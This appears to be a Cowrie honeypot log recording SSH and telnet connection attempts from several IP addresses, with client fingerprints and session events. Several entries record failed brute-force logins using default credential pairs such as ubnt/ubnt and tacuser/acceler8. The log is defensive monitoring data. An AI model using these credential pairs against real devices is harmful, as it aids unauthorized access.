{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36910,"dst_ip":"1.2.3.4","dst_port":23,"session":"1b033b1f10ff","protocol":"telnet","message":"New connection: 212.227.125.160:36910 (1.2.3.4:23) [session: 1b033b1f10ff]","sensor":"my-vps","timestamp":"2025-08-28T17:37:29.186330Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36919,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1ca0da35d68","protocol":"telnet","message":"New connection: 212.227.125.160:36919 (1.2.3.4:23) [session: e1ca0da35d68]","sensor":"my-vps","timestamp":"2025-08-28T17:37:30.229849Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56908,"dst_ip":"1.2.3.4","dst_port":22,"session":"cee0d139c633","protocol":"ssh","message":"New connection: 212.227.125.160:56908 (1.2.3.4:22) [session: cee0d139c633]","sensor":"my-vps","timestamp":"2025-08-28T17:37:44.672141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:37:44.743681Z","src_ip":"212.227.125.160","session":"cee0d139c633"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:37:45.836916Z","src_ip":"212.227.125.160","session":"cee0d139c633"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T17:37:48.497626Z","src_ip":"212.227.125.160","session":"cee0d139c633"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:37:50.362141Z","src_ip":"212.227.125.160","session":"cee0d139c633"}
{"eventid":"cowrie.session.closed","duration":31.171604871749878,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:38:01.401375Z","src_ip":"212.227.125.160","session":"e1ca0da35d68"}
{"eventid":"cowrie.session.closed","duration":33.13873791694641,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:38:02.324997Z","src_ip":"212.227.125.160","session":"1b033b1f10ff"}
{"eventid":"cowrie.session.connect","src_ip":"180.228.222.175","src_port":53736,"dst_ip":"1.2.3.4","dst_port":23,"session":"040b58309431","protocol":"telnet","message":"New connection: 180.228.222.175:53736 (1.2.3.4:23) [session: 040b58309431]","sensor":"my-vps","timestamp":"2025-08-28T17:38:05.584537Z"}
{"eventid":"cowrie.session.closed","duration":30.65250015258789,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:38:36.236944Z","src_ip":"180.228.222.175","session":"040b58309431"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":53286,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fe2d73acfcf","protocol":"ssh","message":"New connection: 171.243.150.220:53286 (1.2.3.4:22) [session: 6fe2d73acfcf]","sensor":"my-vps","timestamp":"2025-08-28T17:38:53.221349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:38:53.239701Z","src_ip":"171.243.150.220","session":"6fe2d73acfcf"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:38:54.309614Z","src_ip":"171.243.150.220","session":"6fe2d73acfcf"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T17:38:56.268897Z","src_ip":"171.243.150.220","session":"6fe2d73acfcf"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:38:58.147849Z","src_ip":"171.243.150.220","session":"6fe2d73acfcf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43894,"dst_ip":"1.2.3.4","dst_port":22,"session":"e14bb4158079","protocol":"ssh","message":"New connection: 212.227.125.160:43894 (1.2.3.4:22) [session: e14bb4158079]","sensor":"my-vps","timestamp":"2025-08-28T17:39:00.689298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:39:00.699015Z","src_ip":"212.227.125.160","session":"e14bb4158079"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:39:00.930630Z","src_ip":"212.227.125.160","session":"e14bb4158079"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T17:39:01.923119Z","src_ip":"212.227.125.160","session":"e14bb4158079"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:39:03.492587Z","src_ip":"212.227.125.160","session":"e14bb4158079"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":50424,"dst_ip":"1.2.3.4","dst_port":22,"session":"d44a0449f124","protocol":"ssh","message":"New connection: 171.243.150.185:50424 (1.2.3.4:22) [session: d44a0449f124]","sensor":"my-vps","timestamp":"2025-08-28T17:39:17.272175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:39:17.363085Z","src_ip":"171.243.150.185","session":"d44a0449f124"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:39:18.352752Z","src_ip":"171.243.150.185","session":"d44a0449f124"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T17:39:19.836657Z","src_ip":"171.243.150.185","session":"d44a0449f124"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:39:21.531536Z","src_ip":"171.243.150.185","session":"d44a0449f124"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36680,"dst_ip":"1.2.3.4","dst_port":22,"session":"d35d190c92e0","protocol":"ssh","message":"New connection: 212.227.125.160:36680 (1.2.3.4:22) [session: d35d190c92e0]","sensor":"my-vps","timestamp":"2025-08-28T17:39:36.653988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:39:36.659461Z","src_ip":"212.227.125.160","session":"d35d190c92e0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:39:37.123022Z","src_ip":"212.227.125.160","session":"d35d190c92e0"}
{"eventid":"cowrie.login.failed","username":"squid","password":"squid","message":"login attempt [squid/squid] failed","sensor":"my-vps","timestamp":"2025-08-28T17:39:38.220806Z","src_ip":"212.227.125.160","session":"d35d190c92e0"}
{"eventid":"cowrie.session.connect","src_ip":"112.17.139.236","src_port":53473,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9abfed36da7","protocol":"ssh","message":"New connection: 112.17.139.236:53473 (1.2.3.4:22) [session: e9abfed36da7]","sensor":"my-vps","timestamp":"2025-08-28T17:39:39.387667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:39:39.388384Z","src_ip":"112.17.139.236","session":"e9abfed36da7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:39:39.655001Z","src_ip":"112.17.139.236","session":"e9abfed36da7"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:39:40.036103Z","src_ip":"212.227.125.160","session":"d35d190c92e0"}
{"eventid":"cowrie.login.failed","username":"tacuser","password":"acceler8","message":"login attempt [tacuser/acceler8] failed","sensor":"my-vps","timestamp":"2025-08-28T17:39:40.755888Z","src_ip":"112.17.139.236","session":"e9abfed36da7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:39:42.022818Z","src_ip":"112.17.139.236","session":"e9abfed36da7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:39:42.987117Z","src_ip":"212.227.235.229","session":"1fd45d48a16b"}
{"eventid":"cowrie.session.closed","duration":180.22464203834534,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:39:42.992296Z","src_ip":"212.227.235.229","session":"1fd45d48a16b"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":60430,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e94eeebefca","protocol":"ssh","message":"New connection: 199.195.253.95:60430 (1.2.3.4:22) [session: 6e94eeebefca]","sensor":"my-vps","timestamp":"2025-08-28T17:40:22.210481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:40:22.221438Z","src_ip":"199.195.253.95","session":"6e94eeebefca"}
